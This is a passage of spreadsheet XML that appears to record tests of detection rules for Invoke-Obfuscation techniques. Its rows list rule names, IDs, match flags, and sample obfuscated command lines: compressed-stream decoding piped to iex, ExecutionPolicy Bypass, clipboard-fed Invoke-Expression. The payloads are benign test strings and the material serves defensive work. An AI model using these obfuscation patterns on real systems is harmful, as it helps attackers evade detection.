        </is>
      </c>
      <c r="D1117" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1117" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmMAnD "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F1117" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1117" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1117" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1117" s="43" t="n"/>
      <c r="J1117" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1117" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1118" ht="15.75" customHeight="1" s="42">
      <c r="A1118" s="43" t="n"/>
      <c r="B1118" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1118" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1118" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1118" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F1118" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1118" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1118" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1118" s="43" t="n"/>
      <c r="J1118" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1118" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1119" ht="15.75" customHeight="1" s="42">
      <c r="A1119" s="43" t="n"/>
      <c r="B1119" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1119" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1119" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1119" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMmAnd "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F1119" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1119" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1119" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1119" s="43" t="n"/>
      <c r="J1119" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1119" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1120" ht="15.75" customHeight="1" s="42">
      <c r="A1120" s="43" t="n"/>
      <c r="B1120" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1120" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1120" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1120" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -CoMMAND "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F1120" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1120" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1120" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1120" s="43" t="n"/>
      <c r="J1120" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1120" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1121" ht="15.75" customHeight="1" s="42">
      <c r="A1121" s="43" t="n"/>
      <c r="B1121" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1121" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1121" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1121" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOMMAND "$d = N`ew-Object System.IO.Compression.DeflateStream($s, 0); $r = N`ew-Object System.IO.StreamReader($d, [System.T`ext.Encoding]::ASCII); $r.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F1121" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1121" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1121" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1121" s="43" t="n"/>
      <c r="J1121" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1121" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1122" ht="15.75" customHeight="1" s="42">
      <c r="A1122" s="43" t="n"/>
      <c r="B1122" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1122" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1122" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1122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122" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1122" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1122" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1122" s="43" t="n"/>
      <c r="J1122" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1122" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1123" ht="15.75" customHeight="1" s="42">
      <c r="A1123" s="43" t="n"/>
      <c r="B1123" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1123" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1123" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1123" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "$stream = [System.IO.Compression.DeflateStream]::new($ms, 0); $reader = [System.IO.StreamReader]::new($stream, [System.Text.Encoding]::UTF8); iex $reader.ReadToEnd()"</t>
        </is>
      </c>
      <c r="F1123" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1123" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1123" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1123" s="43" t="n"/>
      <c r="J1123" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1123" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1124" ht="15.75" customHeight="1" s="42">
      <c r="A1124" s="43" t="n"/>
      <c r="B1124" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1124" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1124" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1124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124" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1124" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1124" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1124" s="43" t="n"/>
      <c r="J1124" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1124" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1125" ht="15.75" customHeight="1" s="42">
      <c r="A1125" s="43" t="n"/>
      <c r="B1125" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_compress</t>
        </is>
      </c>
      <c r="C1125" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation COMPRESS OBFUSCATION</t>
        </is>
      </c>
      <c r="D1125" s="44" t="inlineStr">
        <is>
          <t>7eedcc9d-9fdb-4d94-9c54-474e8affc0c7</t>
        </is>
      </c>
      <c r="E1125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125" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1125" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1125" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1125" s="43" t="n"/>
      <c r="J1125" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1125" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1126" ht="15.75" customHeight="1" s="42">
      <c r="A1126" s="43" t="n"/>
      <c r="B1126" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C1126" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D1126" s="44" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E1126" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "set A=in^voke &amp; set B=environment &amp; echo %A% | powershell -"</t>
        </is>
      </c>
      <c r="F1126" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1126" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1126" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1126" s="44" t="n"/>
      <c r="J1126" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1126" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1127" ht="15.75" customHeight="1" s="42">
      <c r="A1127" s="43" t="n"/>
      <c r="B1127" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C1127" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D1127" s="44" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E1127" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F1127" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1127" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1127" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1127" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1127" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1127" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1128" ht="15.75" customHeight="1" s="42">
      <c r="A1128" s="43" t="n"/>
      <c r="B1128" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C1128" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D1128" s="44" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E1128" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -COmMANd "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F1128" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1128" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1128" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1128" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1128" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1128" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1129" ht="15.75" customHeight="1" s="42">
      <c r="A1129" s="43" t="n"/>
      <c r="B1129" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C1129" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D1129" s="44" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E1129" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ep Bypass -c "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F1129" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1129" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1129" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1129" s="44" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1129" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1129" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1130" ht="15.75" customHeight="1" s="42">
      <c r="A1130" s="43" t="n"/>
      <c r="B1130" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C1130" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D1130" s="44" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E1130" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -ExeCuTIoNpolIcy Bypass -CommANd "$invoke='payload'; Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F1130" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1130" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1130" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1130" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J1130" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1130" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1131" ht="15.75" customHeight="1" s="42">
      <c r="A1131" s="43" t="n"/>
      <c r="B1131" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C1131" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D1131" s="44" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E1131" s="44" t="inlineStr">
        <is>
          <t>set a=1 &amp; set invoke=payload &amp; powershell -c "Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F1131" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1131" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1131" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1131" s="43" t="n"/>
      <c r="J1131" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1131" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1132" ht="15.75" customHeight="1" s="42">
      <c r="A1132" s="43" t="n"/>
      <c r="B1132" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_stdin</t>
        </is>
      </c>
      <c r="C1132" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Stdin</t>
        </is>
      </c>
      <c r="D1132" s="44" t="inlineStr">
        <is>
          <t>9c14c9fa-1a63-4a64-8e57-d19280559490</t>
        </is>
      </c>
      <c r="E1132" s="44" t="inlineStr">
        <is>
          <t>set a=1 &amp; set invoke=payload &amp; powershell -C "Write-Host 'Test Execution'"</t>
        </is>
      </c>
      <c r="F1132" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1132" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1132" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1132" s="43" t="n"/>
      <c r="J1132" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1132" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1133" ht="15.75" customHeight="1" s="42">
      <c r="A1133" s="43" t="n"/>
      <c r="B1133" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1133" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1133" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1133" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo Write-Host 'Test' | c^l^i^p.exe &amp;&amp; powershell -c \"IEX ([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1133" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1133" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1133" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1133" s="44" t="n"/>
      <c r="J1133" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1133" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1134" ht="15.75" customHeight="1" s="42">
      <c r="A1134" s="43" t="n"/>
      <c r="B1134" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1134" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1134" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1134" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "echo Write-Host 'Test' | clip &amp; powershell -c \"IEX ([System.Windows.Forms.Clipboard]::GetText())\""</t>
        </is>
      </c>
      <c r="F1134" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1134" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1134" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I1134" s="43" t="n"/>
      <c r="J1134" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K1134" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1135" ht="15.75" customHeight="1" s="42">
      <c r="A1135" s="43" t="n"/>
      <c r="B1135" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1135" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1135" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1135" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1135" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1135" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1135" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1135" s="44" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1135" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1135" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1136" ht="15.75" customHeight="1" s="42">
      <c r="A1136" s="43" t="n"/>
      <c r="B1136" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1136" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1136" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1136" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -coMMAND "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1136" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1136" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1136" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1136" s="44" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1136" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1136" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1137" ht="15.75" customHeight="1" s="42">
      <c r="A1137" s="43" t="n"/>
      <c r="B1137" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1137" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1137" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1137" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -c "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1137" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1137" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1137" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1137" s="44" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1137" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1137" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1138" ht="15.75" customHeight="1" s="42">
      <c r="A1138" s="43" t="n"/>
      <c r="B1138" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1138" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1138" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1138" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -cOmMaND "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1138" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1138" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1138" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1138" s="44" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1138" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1138" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1139" ht="15.75" customHeight="1" s="42">
      <c r="A1139" s="43" t="n"/>
      <c r="B1139" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1139" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1139" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1139" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMAnD "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1139" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1139" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1139" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1139" s="44" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1139" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1139" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1140" ht="15.75" customHeight="1" s="42">
      <c r="A1140" s="43" t="n"/>
      <c r="B1140" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1140" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1140" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1140" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1140" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1140" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1140" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1140" s="44" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1140" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1140" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1141" ht="15.75" customHeight="1" s="42">
      <c r="A1141" s="43" t="n"/>
      <c r="B1141" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1141" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1141" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1141" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -COMMaND "Set-Clipboard -Value 'Write-Host test'; Invoke-Expression (Get-Clipboard)"</t>
        </is>
      </c>
      <c r="F1141" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1141" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H1141" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I1141" s="44" t="inlineStr">
        <is>
          <t>PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3); PowerShell Get-Clipboard Cmdlet Via CLI (b9aeac14-2ffd-4ad3-b967-1354a4e628c3)</t>
        </is>
      </c>
      <c r="J1141" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K1141" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1142" ht="15.75" customHeight="1" s="42">
      <c r="A1142" s="43" t="n"/>
      <c r="B1142" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_invoke_obfuscation_via_use_clip</t>
        </is>
      </c>
      <c r="C1142" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation Via Use Clip</t>
        </is>
      </c>
      <c r="D1142" s="44" t="inlineStr">
        <is>
          <t>e1561947-b4e3-4a74-9bdd-83baed21bdb5</t>
        </is>
      </c>
      <c r="E1142" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c echo Write-Host 'Bypass Test' | clip &amp; powershell -c IEX([Windows.Forms.Clipboard]::GetText())</t>
        </is>
      </c>
      <c r="F1142" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G1142" s="44" t="b">
        <v>1</v>
      </c>
